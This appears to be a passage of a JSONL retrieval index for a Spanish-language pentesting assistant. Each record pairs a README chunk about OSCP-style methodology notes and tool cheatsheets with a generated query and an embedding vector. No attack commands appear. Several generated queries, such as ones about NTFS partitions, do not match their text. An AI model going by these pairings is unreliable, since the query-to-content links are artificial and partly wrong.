-0.03706, -0.01698, 0.03567, -0.01113, 0.05149, 0.07384, -0.0102, -0.00957, 0.03185, 0.0361, -0.08007, 0.03224, -0.04249, -0.03245, -0.04296, -0.02174, -0.0172, -0.03689, -0.00665, -0.00937, -0.03971, -0.0091, -0.06203, 0.06486, -0.02286, -0.00723, 0.03378, -0.0036, -0.01185, -0.04663, -0.08647, 0.01516, -0.01712, -0.00247, -0.06928, -0.06029, 0.01724, -0.02878, 0.03886, -0.03747, -0.08369, 0.0367, 0.04696, -0.0091, -0.01963, -0.03536, 0.04072, 0.03915, -0.01038, 0.01548, -0.00549, 0.00818, -0.0263, 0.00131, 0.00895, 0.00321, 0.02616, 0.0103, 0.03089, 0.07908, 0.00358, -0.02466, 0.00277, 0.00539, -0.01858, -0.0055, 0.03546, 0.01996, -0.02157, -0.02199, -0.02441, 4e-05, -0.04468, 0.06201, 0.01475, 0.00851, 0.01296, -0.00302, 0.04012, 0.00153, -0.05728, -0.07565, -0.00442, -0.01327, -0.03994, -0.01394, -0.05865, -0.0186, 0.03819, 0.0358, -0.06558, -0.02094, -0.0088]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "con quΓ© puedo aprender a hacer enumeraciΓ³n, explotaciΓ³n web y escalada de privilegios sin buscar apuntes privados?", "v": [0.22488, 0.15218, -0.18896, -0.13529, 0.04015, -0.00988, 0.0594, 0.00776, -0.11851, -0.14194, 0.00258, -0.02108, -0.05576, 0.00679, 0.09123, -0.01846, 0.0658, 0.01686, 0.03508, 0.08118, 0.0021, -0.0349, -0.01009, 0.04327, -0.06512, -0.11871, -0.00162, -0.01717, -0.01895, 0.06676, -0.05892, 0.17992, -0.03307, -0.04278, 0.02913, 0.08008, 0.03161, -0.04942, -0.0139, -0.12075, -0.06817, 0.09084, -0.10326, -0.05985, 0.03371, -0.02097, -0.06804, 0.03771, -0.07733, -0.03789, 0.01406, -0.03256, 0.00272, -0.24287, 0.05014, 0.00389, 0.15273, 0.0325, 0.02095, 0.00218, -0.05831, -0.01295, -0.01494, -0.05711, 0.07208, -0.01775, 0.06523, 0.06411, -0.03436, 0.13364, -0.02409, -0.07305, 0.00148, 0.01568, 0.06508, -0.03616, 0.0065, 0.03558, 0.0416, -0.02517, -0.10306, -0.05123, -0.06053, 0.00681, -0.0431, -0.08406, 0.02134, 0.02295, 0.04006, -0.03748, 0.0775, 0.08844, -0.06589, -0.13319, -0.00585, -0.03788, 0.03524, 0.03173, 0.00841, 0.06202, -0.00666, -0.04777, -0.08853, 0.15177, 0.0895, 0.13533, 0.0419, -0.07188, -0.09193, -0.02192, -0.00574, -0.0399, -0.04937, -0.02552, -0.07409, 0.00041, -0.14671, -0.04108, -0.07649, -0.0587, -0.00779, -0.06354, 0.01026, -0.01424, 0.05165, -0.05956, -0.04276, 0.15673, 0.05633, 0.01071, -0.03749, -0.02075, -0.00323, -0.0009, 0.07642, -0.02155, -0.00857, -0.0144, -0.00585, -0.08861, 0.07455, -0.00918, -0.11104, -0.06189, 0.05417, 0.05566, 0.00685, -0.09132, -0.05845, -0.07554, -0.09937, -0.07078, 0.00059, 0.09196, 0.01439, -0.07163, 0.02516, -0.05267, -0.00338, 0.14659, 0.02077, 0.0204, -0.02978, -0.03131, 0.04813, 0.0369, -0.02544, -0.01704, -0.07639, -0.01965, -0.07171, 0.02026, -0.01874, -0.04433, 0.03386, -0.0499, -0.03363, 0.00432, 0.08489, 0.01211, -0.03351, 0.02573, -0.0371, -0.00526, -0.07152, -0.03279, 0.02314, -0.02262, -0.0322, 0.05184, 0.0199, 0.02285, -0.01198, 0.00585, 0.02056, -0.05645, 0.01038, 0.07593, 0.0046, -0.0305, 0.00126, -0.02978, 0.00167, -0.00636, 0.03475, -0.0716, -0.00679, 0.00684, -0.02536, 0.06031, 0.09249, -0.01042, 0.04975, -0.13031, -0.03608, -0.00508, 0.04035, 0.03246, -0.07114, 0.05134, -0.01916, 0.08553, 0.05173, 0.02138, 0.03781, -0.00899, 0.01532, 0.03142, 0.02545, 0.06833, -0.02756, 0.03354, -0.05905, -0.01861, 0.05179, -0.00157, 0.03946, 0.04273, -0.07195, 0.00507, 0.01735, 0.09805, 0.00456, 0.0019, -0.05592, -0.06742, -0.01236, 0.04478, 0.02288, -0.08988, -0.0205, -0.086, 0.03063, -0.0342, 0.01159, -1e-05]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Conocimiento\n\nMetodologΓ­a de pentesting y Linux que **viene con el repo**, para que un clon\nreciΓ©n hecho ya sepa de estas cosas sin depender de los apuntes privados de\nnadie. `indexa.py` lo indexa junto a las man pages y el glosario.\n\nSon apuntes propios (estilo OSCP) organizados por fase β€”enumeraciΓ³n, explotaciΓ³n\nweb, shells, escalada de privilegios, Active Directory, cheatsheets, avanzadoβ€”\ncon los comandos que se usan de verdad. Usan marcadores como `TU_IP` en vez de\ndirecciones reales; estΓ‘n limpios de datos personales (sin hosts, credenciales,\nrutas ni referencias privadas).\n\n`06 - Cheatsheets/Comandos de herramientas.md` reΓΊne las invocaciones mΓ‘s usadas\nde las herramientas que no traen man page (ffuf, sqlmap, la suite impacket,\nnetexec, hydra, evil-winrm...). `09 - Manuales/` va un paso mΓ‘s allΓ‘: es la salida\nde `--help` de esas mismas herramientas, cosechada con `../manuales.py` de la\npropia herramienta instalada y limpia de rutas. Entre las dos cosas β€”la\ninvocaciΓ³n comΓΊn y la referencia completa de opcionesβ€” el modelo tiene el manual\nque la man page no da. Si instalas una herramienta mΓ‘s, corre `manuales.py` y\nmanda el `.md` nuevo: es un buen commit.", "indexar": "necesito comandos limpios para ffuf, sqlmap e impacket con sus man pages completas, ΒΏquΓ© me ofrece este material?", "v": [0.11069, 0.0812, -0.10069, -0.00066, 0.05968, -0.25141, -0.0538, 0.04749, -0.16375, -0.07851, -0.22738, -0.00396, 0.04906, -0.05615, -0.05093, 0.06469, 0.0614, -0.09258, 0.02254, -0.01495, 0.04316, -0.08318, -0.19987, -0.15467, -0.09363, 0.00959, 0.23723, 0.01566, -0.19453, 0.02372, 0.03231, 0.1045, -0.01694, -0.08902, -0.05317, 0.00474, 0.01951, -0.02365, -0.05204, 0.06019, 0.02631, -0.00757, -0.1614, 0.06861, -0.00442, -0.08642, -0.00913, 0.04164, -0.0041, -0.0579, 0.0205, -0.04908, -0.15998, 0.04502, -0.1726, -0.09533, 0.16036, -0.00641, 0.10035, 0.06948, -0.08255, -0.00562, 0.03179, 0.03451, 0.01444, -0.03015, -0.07318, -0.0555, 0.02482, -0.00679, -0.07689, 0.10076, -0.00258, 0.03647, 0.01092, -0.01471, 0.01407, -0.02697, 0.09872, 0.12049, -0.01516, 0.01164, -0.10865, 0.02188, -0.05906, -0.06596, -0.0198, 0.14729, 0.01728, -0.06105, 0.00604, 0.04292, -0.068, -0.02209, -0.01736, -0.0197, -0.01, 0.13369, 0.03585, -0.01032, -0.05192, -0.05461, -0.02626, 0.01973, 0.01838, -0.03416, 0.01608, 0.02593, -0.04456, 0.08482, 0.07599, -0.03364, 0.08012, -0.02749, -0.02225, -0.07261, 0.05198, 0.00497, -0.02611, -0.08519, -0.05686, 0.01489, -0.01306, 0.0736, 0.07423, -0.026, 0.02609, 0.00366, 0.06279, 0.04449, -0.0148, 0.00063, -0.03884, -0.11402, -0.00727, -0.02446, -0.03052, -0.04386, -0.04559, -0.02468, 0.00567, 0.05432, -0.05279, 0.06753, -0.03943, -0.03541, 0.01086, -0.04504, -0.08725, 0.02375, 0.02477, 0.05442, 0.0501, 0.02615, 0.03953, -0.04348, 0.06832, 0.00805, -0.04774, -0.02522, 0.00414, -0.0198, -0.01237, 0.05022, 0.03133, 0.01554, -0.07905, -0.02947, 0.00721, 0.00535, 0.00919, 0.01305, 0.0383, -0.09394, -0.04402, -0.0751, -0.03771, -0.01576, 0.05358, 0.00384, 0.05197, 0.0379, -0.00583, 0.03737, -0.0426, -0.02921, 0.01609, -0.01165, 0.02243, -0.03256, -0.00694, 0.07441, -0.04323, -0.06698, -0.04336, -0.01655, 0.01627, -0.02103, -0.06632, 0.02198, -0.07337, -0.01106, -0.07322, -0.03414, -0.01905, 0.02918, -0.01125, 0.02861, -0.01663, -0.05036, 0.0498, -0.02251, -0.00257, -0.03829, -0.07187, -0.04756, 0.01122, 0.00188, -0.00043, 0.00814, 0.06262, 0.05243, 0.01599, -0.03497, 0.08495, 0.01971, 0.0529, -0.00599, 0.0713, 0.02429, -0.00992, 0.02536, -0.05647, -0.03419, 0.01932, 0.04292, -0.00712, 0.00762, -0.00758, -0.06069, -0.01012, 0.02911, -0.05521, -0.03847, 0.00939, -0.02029, -0.07438, 0.06167, -0.0888, -0.03836, -0.02552, -0.02547, -0.0054, -0.05991, 0.03353, 0.0006]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "que herramienta sirve para crear documentaciΓ³n genΓ©rica compartida en proyectos de cΓ³digo abierto?", "v": [-0.06744, 0.00145, -0.1412, -0.24622, 0.11683, -0.26014, 0.03495, 0.01771, -0.03888, -0.18129, -0.12603, -0.14236, -0.00358, -0.17258, 0.08339, 0.02672, 0.13052, -0.11144, -0.0112, -0.00981, -0.01886, 0.04993, -0.0247, -0.09929, -0.02316, -0.1133, 0.01819, -0.08509, -0.12921, 0.07968, 0.04262, 0.03675, 0.03551, 0.02809, -0.11094, -0.00481, 0.06557, 0.00526, -0.06129, 0.0429, -0.05231, 0.05676, -0.1021, 0.05556, 0.01029, 0.03407, -0.00875, 0.06803, -0.06073, 0.02674, -0.07161, -0.08958, -0.17192, -0.02296, 0.05786, -0.06609, 0.2118, -0.1747, -0.07626, -0.03843, -0.01988, -0.05903, -0.02449, -0.08773, -0.01522, -0.07514, 0.03531, 0.04533, -0.09515, 0.06347, -0.04174, 0.05613, 0.00613, -0.11792, 0.00051, -0.01586, -0.06926, -0.08909, -0.04717, 0.04761, 0.0775, -0.01648, -0.07009, -0.09245, -0.01421, -0.09434, 0.04934, -0.00675, 0.06088, -0.10312, 0.04991, 0.03377, -0.0305, 0.0229, 0.05068, -0.00287, 0.0857, 0.03202, 0.01479, 0.00448, 0.0172, -0.07735, -0.07939, -0.00296, 0.03917, 0.08049, 0.01129, -0.04171, -0.04442, 0.04648, -0.00035, 0.00858, -0.04166, -0.00591, -0.0831, -0.00567, -0.01617, -0.00624, 0.00542, -0.05986, 0.03623, 0.00516, -0.06824, 0.06326, -0.05499, -0.00303, -0.06448, 0.08536, 0.01977, 0.00769, -0.09302, -0.02364, -0.09449, 0.06523, -0.03227, -0.01276, 0.03502, -0.03055, 0.01309, -0.00033, -0.00501, 0.00712, -0.01308, -0.0154, -0.01585, 0.0285, 0.02379, -0.03635, -0.01239, -0.05078, 0.01433, 0.00838, 0.0094, 0.01829, -0.17237, 0.05643, 0.02814, -0.00212, -0.10629, 0.04576, -0.04865, 0.01806, -0.04604, 0.0061, 0.02734, -0.05848, -0.02262, -0.00905, 0.10087, 0.0508, 0.03689, -0.01467, 0.10719, -0.06454, 0.0431, -0.0876, -0.0358, -0.0496, -0.04506, -0.08246, -0.07778, -0.03086, -0.0161, 0.00776, 0.01565, -0.04054, 0.03344, -0.05372, -0.00891, 0.03647, -0.00456, 0.03062, 0.03842, -0.00464, 0.01606, -0.02238, 0.02981, -0.04291, 0.04087, -0.04628, -0.04041, 0.02372, 0.01977, -0.03676, -0.02232, 0.09565, -0.04423, 0.0219, -0.02349, 0.08087, 0.03788, -0.05406, 0.04994, -0.01091, -0.06135, 0.01625, -0.0076, 0.02157, 0.05075, -0.00981, 0.00159, -0.03971, -0.0062, -0.01838, 0.07525, 2e-05, 0.04164, 0.02275, 0.03249, 0.01213, 0.05529, -0.00917, 0.02329, 0.01831, 0.05432, -0.00749, -0.00105, -0.00662, -0.05504, -0.02785, -0.04115, 0.03185, -0.04415, -0.04651, -0.01048, -0.01655, -0.01477, -0.03445, -0.02092, -0.0678, -0.059, -0.01137, 0.04617, -0.06746, 0.00028, -0.00806]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "cual programa permite aΓ±adir conocimientos tΓ©cnicos sin publicar datos personales privados?", "v": [-0.06501, 0.12233, -0.08011, -0.30255, 0.12199, -0.19605, 0.0991, -0.16724, -0.2193, -0.05822, 0.06819, -0.02198, 0.00874, -0.09277, -0.0265, -0.05489, 0.13835, -0.16581, 0.12064, 0.01993, -0.00548, -0.05106, -0.05442, -0.11129, -0.08406, -0.0593, 0.03263, -0.08721, -0.03464, 0.04861, 0.04674, -0.00029, -0.02269, -0.05036, -0.01361, 0.10595, 0.06317, 0.01481, -0.06032, -0.03796, 0.04148, -0.02213, -0.0257, 0.0962, 0.13886, 0.00185, -0.04433, 0.08427, 0.01082, -0.07511, 0.01486, 0.10441, 0.01922, -0.10311, -0.01281, -0.1387, 0.11932, 0.00518, -0.01002, 0.06396, 0.01544, 0.10369, 0.04973, 0.02793, 0.04227, -0.01566, 0.12023, 0.04616, -0.11538, 0.09647, 0.03292, 0.01172, 0.05819, -0.02196, -0.0037, -0.03513, -0.05543, 0.11126, 0.03001, -0.05458, -0.15358, -0.02035, 0.00425, 0.04956, 0.00567, -0.01135, 0.01614, 0.00137, 0.00621, -0.03731, 0.14612, 0.03639, -0.00796, -0.01476, 0.06334, 0.08919, 0.19143, -0.04283, -0.05582, 0.03149, 0.03011, 0.00887, -0.04114, 0.10153, -0.00842, 0.10065, 0.02905, -0.03844, -0.01653, 0.01739, -0.05783, 0.07949, -0.08614, 0.00278, -0.00501, -0.00505, -0.01904, -0.10238, -0.03005, 0.01817, -0.0475, -0.04275, 0.03167, -0.00497, 0.08578, -0.04585, -0.00803, 0.06644, -0.04165, 0.09733, 0.00639, -0.021, 0.01153, -0.00939, 0.00343, 0.03142, -0.08801, -0.05041, -0.03408, -0.114, -0.02681, 0.03438, -0.06035, -0.02746, -0.02429, -0.05166, -0.04526, -0.05862, -0.01873, -0.00046, -0.00504, 0.05441, -0.04686, 0.10643, -0.08036, -0.01378, -0.00508, -0.03228, -0.05902, 0.0373, 0.02143, 0.06996, -0.06215, -0.00215, 0.03057, 0.01359, 0.03058, -0.00598, 0.0824, 0.08796, -0.04935, 0.03418, -0.01935, -0.07194, 0.02732, 0.01897, -0.07861, -0.06644, 0.03172, -0.01225, -0.03316, -0.02985, 0.03808, -0.03103, -0.01249, -0.03166, -0.04085, -0.01573, 0.00419, -0.02309, -0.04671, 0.00576, -0.01579, -0.00947, 0.04457, -0.00721, -0.0553, 0.0077, 0.04697, -0.01579, -0.01339, 0.06477, -0.03515, 0.00669, -0.01641, 0.04501, -0.00449, -0.05293, 0.01498, 0.00109, -0.00462, -0.05086, 0.02893, -0.04764, -0.01533, 0.0103, 0.01733, -0.01546, 0.00753, 0.05143, -0.01222, -0.01749, 0.04853, -0.01555, 0.01077, -0.06128, 0.07234, 0.01717, 0.02544, -0.00551, -0.0425, 0.00207, -0.01397, -0.01004, 0.08704, 0.00346, -0.01987, -0.03374, -0.03798, -0.06911, 0.00591, 0.08191, 0.03246, -0.05522, 0.02544, -0.01702, -0.07704, 0.05432, 0.02597, -0.0429, -0.02403, 0.01697, -0.00479, -0.05263, 0.03181, -0.01568]} -{"tipo": "pregunta", "herramienta": "README", "perfil": "PENTESTERS", "fichero": "conocimiento/README.md", "tema": "", "fuente": null, "licencia": null, "texto": "Es la parte del RAG que SÍ se publica: el conocimiento genΓ©rico. Los apuntes\npersonales del usuario (su `saber.jsonl`, su diario) no se suben β€”ver\n[../../../PRIVACIDAD.md](../../../PRIVACIDAD.md)β€”; este pack los complementa, y en\nla mΓ‘quina del usuario se solapan y el deduplicado de `busca.py` los colapsa.\n\nAΓ±adir o corregir metodologΓ­a aquΓ­ es un buen commit: es Markdown, se indexa\nsolo, y mejora a todo el que clone.", "indexar": "con que puedo generar contenido de metodologΓ­a que mejore automΓ‘ticamente la documentaciΓ³n pΓΊblica?", "v": [0.12003, 0.18429, -0.06731, -0.12886, 0.1126, 0.00786, 0.07432, -0.00116, -0.18304, -0.12971, -0.04425, -0.01057, 0.07669, -0.09775, -0.03586, 0.05925, 0.15448, -0.20943, -0.00579, 0.00212, 0.06881, -0.11929, -0.03263, -0.09445, 0.02031, -0.03815, 0.05913, -0.05801, -0.06466, -0.0741, 0.01781, 0.08914, -0.03609, -0.02709, -0.08542, 0.04357, 0.00122, 0.07265, -0.19196, 0.01297, -0.02761, -0.06419, -0.07618, 0.07718, -0.0182, 0.0231, 0.00877, 0.03556, -0.09718, -0.08361, -0.03832, -0.04535, -0.04183, -0.0423, -0.12476, -0.03028, 0.09085, -0.09753, -0.04225, -0.06595, 0.00074, 0.0606, -0.01131, -0.02268, 0.01644, 0.06238, 0.16032, 0.02624, -0.01596, 0.03132, -0.00252, -0.07956, -0.00771, -0.04312, -0.02892, 0.0658, -0.11029, 0.03251, 0.02097, 0.14653, 0.01515, -0.04704, -0.05043, 0.05429, -0.1149, 0.00531, 0.00769, -0.08757, 0.11962, -0.0848, 0.01785, -0.10713, 0.02034, 0.0347, 0.02078, -0.07229, 0.0808, -0.03095, 0.00812, 0.00721, -0.0027, -0.02425, -0.04856, 0.01445, 0.04818, 0.05398, 0.02986, -0.06156, 0.00597, -0.03076, -0.02231, -0.0083, -0.03768, -0.02235, -0.07321, -0.04591, -0.00186, 0.03532, -0.06244, -0.07747, -0.02347, -0.06549, -0.0408, -0.08546, 0.0576, -0.07415, -0.03329, 0.04749, 0.06121, 0.04811, 0.04297, 0.01818, -0.07249, 0.04763, 0.02494, -0.00498, -0.04115, -0.0708, -0.05212, -0.02053, 0.05017, -0.01923, -0.03012, -0.05661, -0.0123, -0.13794, 0.00015, -0.12266, -0.0808, -0.02286, 0.01672, -0.0306, 0.05872, 0.03881, -0.08437, 0.03675, 0.05079, -0.05628, -0.00099, 0.08676, 0.0313, -0.01803, -0.04235, 0.05193, 0.00201, 0.04331, -0.06204, -0.0316, 0.00503, -0.03003, -0.02718, 0.02506, -0.03739, -0.12577, 0.03489, -0.09343, -0.05548, -0.08424, 0.01846, -0.00185, -0.09421, -0.02538, -0.05281, -0.06052, 0.00177, -0.05546, -0.00641, -0.10862, 0.0611, 0.02542, -0.03754, -0.03414, 0.0019, 0.01078, -0.04244, -0.07343, -0.02125, -0.0223, 0.03571, 0.01367, -0.06504, 0.03247, 0.00089, 0.00564, -0.02885, 0.07483, -0.05595, 0.02748, -0.02749, 0.041, 0.00077, -0.03083, 0.05891, -0.07243, -0.04441, 0.04824, -0.02225, -0.09874, -0.0629, 0.02687, 0.08027, 0.05478, 0.07109, -0.02402, 0.0494, 0.04471, 0.02971, 0.02964, 0.03407, -0.00744, -0.05229, 0.03327, -0.00585, -0.04905, 0.06245, 0.03657, 0.02179, -0.10745, -0.0445, -0.07663, 0.03101, 0.00724, -0.07669, -0.06561, 0.02722, -0.08272, -0.0532, -0.00029, 0.07721, -0.09107, 0.00497, -0.0061, 0.03479, -0.0108, 0.0535, -0.11671]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "que programa hay para desmontar particiones NTFS antiguas", "v": [-0.09674, -0.06168, 0.11151, -0.10119, -0.02001, 0.02518, -0.01082, -0.06349, -0.06567, 0.05413, -0.03789, 0.05721, 0.05297, 0.05688, -0.04179, 0.07114, 0.03993, -0.16441, 0.11793, 0.10304, -0.16137, 0.02402, 0.04194, -0.11124, -0.02106, -0.02655, -0.00881, -0.06597, -0.07759, 0.08613, 0.13477, -0.0109, 0.00075, -0.01549, 0.09755, -0.08284, 0.05575, 0.0065, 0.03169, -0.02857, 0.02983, 0.15732, -0.0024, 0.07975, 0.02087, -0.07126, -0.07272, 0.02423, 0.12116, -0.11789, 0.07659, 0.00689, 0.04615, -0.01335, -0.01633, -0.12315, -0.0207, -0.0124, -0.07394, 0.00731, -0.05139, 0.05496, -0.05438, -0.07873, 0.0546, -0.11118, 0.08054, 0.05121, -0.0214, 0.01929, -0.15658, -0.00256, 0.06246, -0.10589, -0.09561, -0.00666, -0.04678, -0.0083, 0.00029, 0.00021, 0.00325, -0.08532, -0.00906, 0.064, -0.11062, -0.01845, 0.04694, -0.03039, -0.08745, -0.06197, -0.09445, 0.05617, 0.02528, 0.1012, 0.06434, -0.09571, 0.12738, 0.14418, 0.07062, 0.09086, 0.06723, -0.07822, 0.05104, 0.08764, -0.10335, -0.03695, 0.07702, -0.05134, 0.00295, 0.15173, 0.06653, -0.01165, -0.04809, -0.04184, -0.05919, -0.00691, -0.03612, -0.02018, -0.00249, -0.0127, -0.0334, 0.02035, -0.0268, 0.10153, -0.01571, -0.01483, -0.0007, 0.16257, -0.10918, 0.05365, -0.02338, -0.05193, -0.04736, 0.00077, -0.00893, -0.10213, -0.00468, 0.01555, 0.0572, -0.09691, 0.10209, 0.1251, -0.06232, 0.06291, 0.01718, 0.07873, 0.05092, -0.08584, 0.01994, 0.07636, 0.11117, -0.00248, -0.04299, 0.05047, -0.05891, -0.01573, 0.05013, -0.02169, -0.08409, 0.00045, -0.04905, 0.01355, -0.10188, -0.07412, 0.06943, -0.06365, 0.01086, 0.0579, 0.06391, 0.00322, -0.03858, 0.08875, 0.00308, -0.09877, 0.02264, -0.02631, 0.03318, -0.08653, 0.03836, -0.00711, -0.06985, 0.04984, 0.09635, 0.0102, 0.0093, -0.03445, -0.01703, 0.03613, -0.01047, -0.07496, -0.01373, 0.03205, -0.07581, 0.01166, 0.01852, -0.01641, -0.00239, -0.0269, 0.00374, 0.01089, -0.05969, 0.01463, -0.00071, -0.0176, -0.0307, 0.08213, -0.00889, 0.05621, -0.00873, 0.10621, 0.0855, -0.03568, -0.01214, 0.03708, -0.04966, -0.01195, 0.01225, 0.00442, 0.02384, 0.05611, -0.02559, -0.03832, 0.05909, 0.0589, 0.01222, -0.1146, 0.02158, 0.10097, 0.0642, -0.01544, 0.00252, -0.0371, -0.02857, -0.02876, 0.032, -0.03036, -0.00191, -0.00022, -0.02281, -0.08039, 0.0232, 0.02816, -0.06003, -0.06219, 0.00386, -0.03235, -0.01107, -0.02261, 0.0347, 0.05951, 0.01379, -0.00504, 0.0052, -0.06636, 0.01304, 0.05229]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "con que puedo montar un disco sin sistema de archivos", "v": [0.02162, -0.05257, -0.19479, -0.0716, -0.20256, -0.04146, -0.08785, 0.00684, -0.1719, -0.08098, -0.01985, -0.12513, -0.02775, -0.09976, 0.06601, -0.02554, 0.06734, -0.02442, -0.01521, -0.06736, -0.05392, -0.13047, 0.01641, -0.05546, 0.09926, -0.01591, -0.03289, -0.01818, -0.19791, 0.03458, 0.00521, 0.06608, 0.05678, -0.04936, 0.00781, -0.10739, 0.05571, 0.02643, 0.07329, -0.03306, -0.00752, -0.01127, -0.00975, 0.1528, -0.03956, -0.08839, 0.1269, -0.08412, 0.01689, -0.02534, 0.01817, -0.00265, -0.09704, -0.00199, -0.01553, -0.20124, -0.06267, -0.01908, 0.12017, 0.06279, -0.01532, 0.15544, -0.05822, 0.09458, 0.07325, 0.08081, 0.01375, -0.07978, -0.09517, 0.09723, -0.015, -0.00973, 0.13911, -0.02233, -0.03468, 0.05593, 0.08475, -0.06118, -0.04421, -0.04667, 0.02515, -0.0276, 0.01852, 0.07076, -0.09362, -0.05746, 0.03411, 0.02458, 0.03013, 0.02017, 0.01225, -0.03133, 0.00915, 0.01182, 0.07749, -0.05201, 0.03879, 0.1223, -0.07099, -0.03516, -0.04194, 0.06822, -0.00037, 0.11607, 0.08743, -0.02183, 0.11163, 0.00849, 0.08719, -0.02243, 0.06247, 0.10053, -0.00139, 0.0214, -0.11726, -0.056, 0.00702, 0.10792, -0.09665, 0.07775, 0.00327, 0.12243, 0.0057, -0.02127, 0.11999, -0.00556, 0.12272, 0.07859, -0.09777, 0.06152, 0.09048, 0.01161, -0.04535, 0.02241, 0.0137, -0.00299, -0.05148, 0.08726, -0.0199, -0.0103, 0.10219, 0.0612, -0.02482, -0.03489, 0.06354, 0.02952, 0.04561, -0.04779, -0.01071, -0.1014, -0.04641, 0.12593, -0.00563, -0.06675, -0.0677, 0.03237, 0.08934, -0.0815, 0.05867, -0.05494, 0.05571, 0.05358, -0.05237, 0.05232, -0.05383, 0.00475, 0.00926, -0.02674, 0.03326, -0.01393, -0.02507, 0.03303, 0.08089, -0.00491, 0.04736, 0.00302, -0.05243, -0.07498, 0.08832, 0.04134, -0.03861, -0.00058, -0.03602, -0.02993, -0.01712, -0.00085, 0.04168, 0.02689, -0.00543, 0.01774, 0.09431, -0.00727, -0.00925, 0.02226, -0.03468, -0.04273, -0.05815, 0.02374, -0.03452, 0.04498, -0.03757, -0.02336, 0.00506, -0.0146, 0.02832, -0.0086, 0.00719, 0.05596, 0.08274, 0.00153, 0.01411, -0.00153, 0.04739, -0.0321, -0.00358, 0.00751, -0.02959, 0.06491, -0.02616, 0.02966, 0.01548, 0.02797, 0.07897, 0.01741, -0.04681, -0.00184, -0.0372, 0.0301, 0.0396, -0.02788, -0.00868, -0.05774, -0.00589, 0.04471, 0.01502, -0.00223, -0.00118, -0.01143, -0.03626, -0.04169, 0.04629, 0.0703, 0.03444, -0.01556, -0.01677, -0.06476, -0.0166, -0.00891, 0.01784, -0.06558, 0.01081, 0.04899, -0.03647, -0.03239, 0.01985, 0.02402]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Trucos y Trampas β€” OSCP / Pentest\n\n> Compilado de cultura pΓΊblica (TJ Null, ippsec, 0xdf, Heath Adams, /r/oscp, HackTricks, foros HTB).\n> **No** son contenidos del Discord privado de OffSec ni material bajo NDA.\n> Son **anti-rabbit-holes**, **detalles olvidados** y **patrones que se repiten** en mΓ‘quinas estilo OSCP.\n\n---", "indexar": "cual es una alternativa libre a los trucos de montaje estΓ‘ndar", "v": [0.23665, 0.02307, -0.19671, -0.05577, 0.03512, 0.03683, -0.02704, -0.03823, -0.07971, 0.07744, -0.06691, -0.13097, 0.01312, 0.10209, 0.08, -0.03941, 0.13099, -0.15686, 0.14469, 0.00345, -0.06547, -0.13096, -0.15064, 0.00283, 0.00775, -0.09577, 0.03268, -0.04974, -0.21924, -0.11026, 0.10397, 0.03424, 0.11004, 0.02186, -0.00708, -0.04444, 0.1496, -0.0005, 0.02914, -0.00622, -0.04188, 